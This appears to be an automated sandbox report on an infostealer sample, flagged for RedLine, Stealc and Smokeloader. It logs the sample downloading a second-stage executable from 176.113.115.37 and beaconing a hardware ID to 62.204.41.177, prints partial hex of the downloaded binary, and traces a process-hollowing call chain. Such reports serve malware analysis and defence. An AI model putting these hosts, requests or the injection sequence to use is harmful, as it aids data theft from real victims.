                                                      Oct 25, 2024 22:37:08.613749981 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.613806009 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.613806963 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.613842010 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.613861084 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.613886118 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.662982941 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663037062 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663052082 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663072109 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663100004 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663105965 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663120985 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663146019 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663158894 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663203001 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663377047 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663393021 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663408041 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663423061 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663428068 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663439989 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:08.663449049 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663467884 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:08.663491011 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:12.140918970 CEST8049731176.113.115.37192.168.2.4
                                                      Oct 25, 2024 22:37:12.141155958 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:37:12.758204937 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:12.795691013 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:12.798620939 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:12.798758030 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:12.804498911 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:13.687746048 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:13.687824965 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:14.001930952 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:14.007637978 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:15.321656942 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:15.321805954 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:20.474244118 CEST804973262.204.41.177192.168.2.4
                                                      Oct 25, 2024 22:37:20.475545883 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:37:35.219454050 CEST4973280192.168.2.462.204.41.177
                                                      Oct 25, 2024 22:38:54.141582966 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:38:54.453803062 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:38:55.063177109 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:38:56.266328096 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:38:58.674230099 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:39:03.484950066 CEST4973180192.168.2.4176.113.115.37
                                                      Oct 25, 2024 22:39:13.095679045 CEST4973180192.168.2.4176.113.115.37

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 25, 2024 22:37:04.165034056 CEST5453853192.168.2.41.1.1.1
                                                      Oct 25, 2024 22:37:04.179153919 CEST53545381.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 25, 2024 22:37:04.165034056 CEST192.168.2.41.1.1.10xb824Standard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 25, 2024 22:37:04.179153919 CEST1.1.1.1192.168.2.40xb824No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                      Oct 25, 2024 22:37:04.179153919 CEST1.1.1.1192.168.2.40xb824No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • post-to-me.com
                                                      • 176.113.115.37
                                                      • 62.204.41.177

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449731176.113.115.37807348C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 25, 2024 22:37:05.792231083 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                      User-Agent: ShareScreen
                                                      Host: 176.113.115.37
                                                      Oct 25, 2024 22:37:06.688033104 CEST1236INHTTP/1.1 200 OK
                                                      Date: Fri, 25 Oct 2024 20:37:06 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Last-Modified: Fri, 25 Oct 2024 20:30:02 GMT
                                                      ETag: "55e00-62552fbce3b10"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 351744
                                                      Content-Type: application/x-msdos-program
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 19 f5 7d 5c 5d 94 13 0f 5d 94 13 0f 5d 94 13 0f e0 db 85 0f 5c 94 13 0f 43 c6 97 0f 41 94 13 0f 43 c6 86 0f 4c 94 13 0f 43 c6 90 0f 00 94 13 0f 7a 52 68 0f 5a 94 13 0f 5d 94 12 0f 21 94 13 0f 43 c6 99 0f 5c 94 13 0f 43 c6 87 0f 5c 94 13 0f 43 c6 82 0f 5c 94 13 0f 52 69 63 68 5d 94 13 0f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f6 49 df 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 aa 0f 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 b9 b7 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}\]]]\CACLCzRhZ]!C\C\C\Rich]PELIep@&P}.textop `.rdata"$t@@.data|H@.rsrc]~@@
                                                      Oct 25, 2024 22:37:06.688093901 CEST212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 b0 43 00 75 02 f3 c3 e9 e5 06 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 5c 08 00 00 8b
                                                      Data Ascii: ;CuUQeVEPuu\u9EttM^jhCeu;5hfQw"jYeVYEEEjYUVu
                                                      Oct 25, 2024 22:37:06.688132048 CEST1236INData Raw: a1 00 00 00 53 57 8b 3d e0 80 43 00 83 3d ec c7 43 00 00 75 18 e8 59 1c 00 00 6a 1e e8 a7 1a 00 00 68 ff 00 00 00 e8 e9 17 00 00 59 59 a1 58 66 51 00 83 f8 01 75 0e 85 f6 74 04 8b c6 eb 03 33 c0 40 50 eb 1c 83 f8 03 75 0b 56 e8 53 ff ff ff 59 85
                                                      Data Ascii: SW=C=CuYjhYYXfQut3@PuVSYuuFVj5Cu.j^9@Ctu7Ytu{00_[VY3^]UjjuE]U]UQSVW5HfQ5
                                                      Oct 25, 2024 22:37:06.688168049 CEST1236INData Raw: 50 ff 15 ec 80 43 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 27 b9 0b 01 00 00 66 39 88 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f 95 c1 89 4d e4 eb
                                                      Data Ascii: PCj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS-YujXYujGY5](3}jWYCxfQ1dC1}j1Y.}j YSY;tPY.]tMjYQ
                                                      Oct 25, 2024 22:37:06.688204050 CEST424INData Raw: ff 15 04 81 43 00 5d c3 6a 0c 68 88 95 43 00 e8 b0 0b 00 00 33 ff 47 89 7d e4 33 db 39 1d ec c7 43 00 75 18 e8 a2 12 00 00 6a 1e e8 f0 10 00 00 68 ff 00 00 00 e8 32 0e 00 00 59 59 8b 75 08 8d 34 f5 80 b1 43 00 39 1e 74 04 8b c7 eb 6e 6a 18 e8 dd
                                                      Data Ascii: C]jhC3G}39Cujh2YYu4C9tnjY;u3QjYY]9u,hW 2YYuWt2YQ]>WY2YEEHj(YUEV4C>uP"Yuj&Y
                                                      Oct 25, 2024 22:37:06.688240051 CEST1236INData Raw: eb 8d 4c 02 04 f7 d3 21 5c b8 44 fe 09 75 23 8b 4d 08 21 19 eb 1c 8d 4a e0 d3 eb 8d 4c 02 04 f7 d3 21 9c b8 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d
                                                      Data Ascii: L!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMq
                                                      Oct 25, 2024 22:37:06.688270092 CEST212INData Raw: 00 00 00 80 83 f9 20 73 1a d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 5c 90 44 fe 09 75 26 8b 4d 08 21 19 eb 1f 83 c1 e0 d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 4f 08 8b 5f 04 89 59 04 8b 4f 04 8b 7f 08 89
                                                      Data Ascii: sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLML s}uMDD }
                                                      Oct 25, 2024 22:37:06.688302040 CEST1236INData Raw: 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00 8d 4f e0 ba 00 00 00 80 d3 ea 09 10 8b 55 0c 8b 4d fc 8d 44 32 fc 89 08 89 4c 01 fc eb 03 8b 55 0c 8d 46 01 89 42 fc 89 44 32 f8 e9 3c 01 00 00 33 c0 e9 38 01 00 00 0f 8d
                                                      Data Ascii: uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL!uM!Y]OwqwOqu
                                                      Oct 25, 2024 22:37:06.688338041 CEST1236INData Raw: cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 b0 43 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 47 e9 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 37 e9 ff ff 8b
                                                      Data Ascii: US]Vs35CWEE{tN38GNF387E@fMUS[EMt_I[LDEEt<+E|@GEu}t$tN38NV3:E_^[]EM9csmu)
                                                      Oct 25, 2024 22:37:06.688375950 CEST1236INData Raw: 00 00 56 e8 14 29 00 00 56 e8 ae 17 00 00 56 e8 f7 28 00 00 68 f2 2a 40 00 e8 7f 04 00 00 83 c4 24 a3 a4 b2 43 00 5e c3 8b ff 55 8b ec 51 51 53 8b 5d 08 56 57 33 f6 33 ff 89 7d fc 3b 1c fd a8 b2 43 00 74 09 47 89 7d fc 83 ff 17 72 ee 83 ff 17 0f
                                                      Data Ascii: V)VV(h*@$C^UQQS]VW33};CtG}rwjy.Y4jh.Yu=CAhCS(CW-tVVVVVjhACVjEC(Cu&hChV-t3PPPPP
                                                      Oct 25, 2024 22:37:06.694031954 CEST1236INData Raw: eb 27 be 04 88 43 00 56 ff 15 34 80 43 00 85 c0 75 0b 56 e8 04 f8 ff ff 59 85 c0 74 18 68 f4 87 43 00 50 ff 15 84 80 43 00 85 c0 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d c3 6a 00 e8 87 ff ff ff 59 c3 8b ff 55 8b ec 56 ff 35 64 b3 43 00 8b 35
                                                      Data Ascii: 'CV4CuVYthCPCtuEE^]jYUV5dC5,Ct!`CtP5dCt'CV4CuVYth CPCtuEE^]0CV5dC,Cu5HCeYV5dC4C^


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.44973262.204.41.177807456C:\Users\user\AppData\Local\Temp\81C9.tmp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 25, 2024 22:37:12.798758030 CEST88OUTGET / HTTP/1.1
                                                      Host: 62.204.41.177
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 25, 2024 22:37:13.687746048 CEST203INHTTP/1.1 200 OK
                                                      Date: Fri, 25 Oct 2024 20:37:13 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Oct 25, 2024 22:37:14.001930952 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI
                                                      Host: 62.204.41.177
                                                      Content-Length: 219
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 32 42 41 42 38 35 39 32 31 38 32 33 33 38 31 35 39 31 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a
                                                      Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="hwid"B2BAB85921823381591466------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"default9_cap------DAECFIJDAAAKECBFCGHI--
                                                      Oct 25, 2024 22:37:15.321656942 CEST210INHTTP/1.1 200 OK
                                                      Date: Fri, 25 Oct 2024 20:37:14 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730104.21.56.704437348C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-25 20:37:05 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                      User-Agent: ShareScreen
                                                      Host: post-to-me.com
                                                      2024-10-25 20:37:05 UTC773INHTTP/1.1 200 OK
                                                      Date: Fri, 25 Oct 2024 20:37:05 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Powered-By: PHP/5.4.16
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRTk7mK0HRksQrPZtCNTHW5xkZ7UN%2FWuY3dl8ZHMt2JTB51VsWQuyYuBA%2BLpgKDfX9UtMQAfeP4dR8BbJkWVp3V6EqToAg9zZVf5n4SwFrGG1KDCigA2nRbIHQRluzvUcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8d8500a39cfc283f-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1436&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=728&delivery_rate=2023759&cwnd=251&unsent_bytes=0&cid=aa9069e311051193&ts=744&x=0"
                                                      2024-10-25 20:37:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                      Data Ascii: 2ok
                                                      2024-10-25 20:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:16:37:02
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\VAIIBIHmtT.exe"
                                                      Imagebase:0x400000
                                                      File size:463'872 bytes
                                                      MD5 hash:35489D9DC0929E90B0B89B4F569DF8C1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:16:37:03
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\VAIIBIHmtT.exe"
                                                      Imagebase:0x400000
                                                      File size:463'872 bytes
                                                      MD5 hash:35489D9DC0929E90B0B89B4F569DF8C1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:2
                                                      Start time:16:37:08
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\81C9.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\81C9.tmp.exe"
                                                      Imagebase:0x400000
                                                      File size:351'744 bytes
                                                      MD5 hash:E00B441455DC50083BB537C343EB1B99
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:16:37:14
                                                      Start date:25/10/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                                                      Imagebase:0xa50000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:1.8%
                                                        Dynamic/Decrypted Code Coverage:47.9%
                                                        Signature Coverage:25.8%
                                                        Total number of Nodes:213
                                                        Total number of Limit Nodes:27
                                                        execution_graph 36511 740000 36514 740630 36511->36514 36513 740005 36515 74064c 36514->36515 36517 741577 36515->36517 36520 7405b0 36517->36520 36523 7405dc 36520->36523 36521 7405e2 GetFileAttributesA 36521->36523 36522 74061e 36523->36521 36523->36522 36525 740420 36523->36525 36526 7404f3 36525->36526 36527 7404ff CreateWindowExA 36526->36527 36529 7404fa 36526->36529 36528 740540 PostMessageA 36527->36528 36527->36529 36530 74055f 36528->36530 36529->36523 36530->36529 36532 740110 VirtualAlloc GetModuleFileNameA 36530->36532 36533 740414 36532->36533 36534 74017d CreateProcessA 36532->36534 36533->36530 36534->36533 36536 74025f VirtualFree VirtualAlloc Wow64GetThreadContext 36534->36536 36536->36533 36537 7402a9 ReadProcessMemory 36536->36537 36538 7402e5 VirtualAllocEx NtWriteVirtualMemory 36537->36538 36539 7402d5 NtUnmapViewOfSection 36537->36539 36540 74033b 36538->36540 36539->36538 36541 740350 NtWriteVirtualMemory 36540->36541 36542 74039d WriteProcessMemory Wow64SetThreadContext ResumeThread 36540->36542 36541->36540 36543 7403fb ExitProcess 36542->36543 36545 4037f5 36546 403806 36545->36546 36580 4054fc HeapCreate 36546->36580 36549 403845 36582 406db4 GetModuleHandleW 36549->36582 36553 403856 __RTC_Initialize 36616 406704 36553->36616 36556 403870 GetCommandLineW 36631 4066a7 GetEnvironmentStringsW 36556->36631 36557 403864 36557->36556 36671 40555c 67 API calls 3 library calls 36557->36671 36560 40386f 36560->36556 36561 40387f 36638 4065f9 GetModuleFileNameW 36561->36638 36564 403894 36644 4063ca 36564->36644 36568 4038a5 36657 40561b 36568->36657 36571 4038ac 36573 4038b7 __wwincmdln 36571->36573 36674 40555c 67 API calls 3 library calls 36571->36674 36663 402de0 36573->36663 36576 4038e6 36676 4057f8 67 API calls _doexit 36576->36676 36579 4038eb _raise 36581 403839 36580->36581 36581->36549 36669 40379d 67 API calls 3 library calls 36581->36669 36583 406dc8 36582->36583 36584 406dcf 36582->36584 36677 40552c Sleep GetModuleHandleW 36583->36677 36586 406f37 36584->36586 36587 406dd9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 36584->36587 36699 406ace 7 API calls __decode_pointer 36586->36699 36589 406e22 TlsAlloc 36587->36589 36588 406dce 36588->36584 36592 40384b 36589->36592 36593 406e70 TlsSetValue 36589->36593 36592->36553 36670 40379d 67 API calls 3 library calls 36592->36670 36593->36592 36594 406e81 36593->36594 36678 405816 6 API calls 4 library calls 36594->36678 36596 406e86 36679 4069a4 TlsGetValue 36596->36679 36599 4069a4 __encode_pointer 6 API calls 36600 406ea1 36599->36600 36601 4069a4 __encode_pointer 6 API calls 36600->36601 36602 406eb1 36601->36602 36603 4069a4 __encode_pointer 6 API calls 36602->36603 36604 406ec1 36603->36604 36689 4046a0 InitializeCriticalSectionAndSpinCount __mtinitlocknum 36604->36689 36606 406ece 36606->36586 36690 406a1f 6 API calls __crt_waiting_on_module_handle 36606->36690 36608 406ee2 36608->36586 36691 407ffc 36608->36691 36612 406f15 36612->36586 36613 406f1c 36612->36613 36698 406b0b 67 API calls 5 library calls 36613->36698 36615 406f24 GetCurrentThreadId 36615->36592 36720 405314 36616->36720 36618 406710 GetStartupInfoA 36619 407ffc __calloc_crt 67 API calls 36618->36619 36625 406731 36619->36625 36620 40694f _raise 36620->36557 36621 4068cc GetStdHandle 36626 406896 36621->36626 36622 406931 SetHandleCount 36622->36620 36623 407ffc __calloc_crt 67 API calls 36623->36625 36624 4068de GetFileType 36624->36626 36625->36620 36625->36623 36625->36626 36628 406819 36625->36628 36626->36620 36626->36621 36626->36622 36626->36624 36722 407f57 InitializeCriticalSectionAndSpinCount _raise 36626->36722 36627 406842 GetFileType 36627->36628 36628->36620 36628->36626 36628->36627 36721 407f57 InitializeCriticalSectionAndSpinCount _raise 36628->36721 36632 4066b8 36631->36632 36634 4066bc 36631->36634 36632->36561 36723 407fb7 67 API calls _malloc 36634->36723 36636 4066dd __realloc_crt 36637 4066e4 FreeEnvironmentStringsW 36636->36637 36637->36561 36639 40662e _wparse_cmdline 36638->36639 36640 403889 36639->36640 36641 40666b 36639->36641 36640->36564 36672 40555c 67 API calls 3 library calls 36640->36672 36724 407fb7 67 API calls _malloc 36641->36724 36643 406671 _wparse_cmdline 36643->36640 36645 4063e2 _wcslen 36644->36645 36649 40389a 36644->36649 36646 407ffc __calloc_crt 67 API calls 36645->36646 36652 406406 _wcslen 36646->36652 36647 40646b 36727 406145 67 API calls 6 library calls 36647->36727 36649->36568 36673 40555c 67 API calls 3 library calls 36649->36673 36650 407ffc __calloc_crt 67 API calls 36650->36652 36651 406491 36728 406145 67 API calls 6 library calls 36651->36728 36652->36647 36652->36649 36652->36650 36652->36651 36655 406450 36652->36655 36725 409c9f 67 API calls __cftoe_l 36652->36725 36655->36652 36726 4080a5 10 API calls 3 library calls 36655->36726 36658 405629 __IsNonwritableInCurrentImage 36657->36658 36729 407e95 36658->36729 36660 405647 __initterm_e 36662 405666 __IsNonwritableInCurrentImage __initterm 36660->36662 36733 408934 74 API calls __cinit 36660->36733 36662->36571 36664 403113 36663->36664 36734 402b10 36664->36734 36666 403133 36667 40314c GetCurrentDirectoryA 36666->36667 36668 40315c 36666->36668 36667->36666 36668->36576 36675 4057cc 67 API calls _doexit 36668->36675 36669->36549 36670->36553 36671->36560 36672->36564 36673->36568 36674->36573 36675->36576 36676->36579 36677->36588 36678->36596 36680 4069bc 36679->36680 36681 4069dd GetModuleHandleW 36679->36681 36680->36681 36684 4069c6 TlsGetValue 36680->36684 36682 4069f8 GetProcAddress 36681->36682 36683 4069ed 36681->36683 36686 4069d5 36682->36686 36700 40552c Sleep GetModuleHandleW 36683->36700 36688 4069d1 36684->36688 36686->36599 36687 4069f3 36687->36682 36687->36686 36688->36681 36688->36686 36689->36606 36690->36608 36694 408005 36691->36694 36693 406efb 36693->36586 36697 406a1f 6 API calls __crt_waiting_on_module_handle 36693->36697 36694->36693 36695 408023 Sleep 36694->36695 36701 40a574 36694->36701 36696 408038 36695->36696 36696->36693 36696->36694 36697->36612 36698->36615 36700->36687 36702 40a580 _raise 36701->36702 36703 40a598 36702->36703 36711 40a5b7 _memset 36702->36711 36714 405a8a 67 API calls __getptd_noexit 36703->36714 36705 40a59d 36715 4081cd 6 API calls 2 library calls 36705->36715 36707 40a629 HeapAlloc 36707->36711 36710 40a5ad _raise 36710->36694 36711->36707 36711->36710 36716 40481c 67 API calls 2 library calls 36711->36716 36717 40502e 5 API calls 2 library calls 36711->36717 36718 40a670 LeaveCriticalSection _doexit 36711->36718 36719 405aac 6 API calls __decode_pointer 36711->36719 36714->36705 36716->36711 36717->36711 36718->36711 36719->36711 36720->36618 36721->36628 36722->36626 36723->36636 36724->36643 36725->36652 36726->36655 36727->36649 36728->36649 36730 407e9b 36729->36730 36731 4069a4 __encode_pointer 6 API calls 36730->36731 36732 407eb3 36730->36732 36731->36730 36732->36660 36733->36662 36735 402b26 SetLastError 36734->36735 36736 402b31 36735->36736 36737 402b3a 36735->36737 36736->36735 36736->36737 36738 402b80 36737->36738 36739 402b46 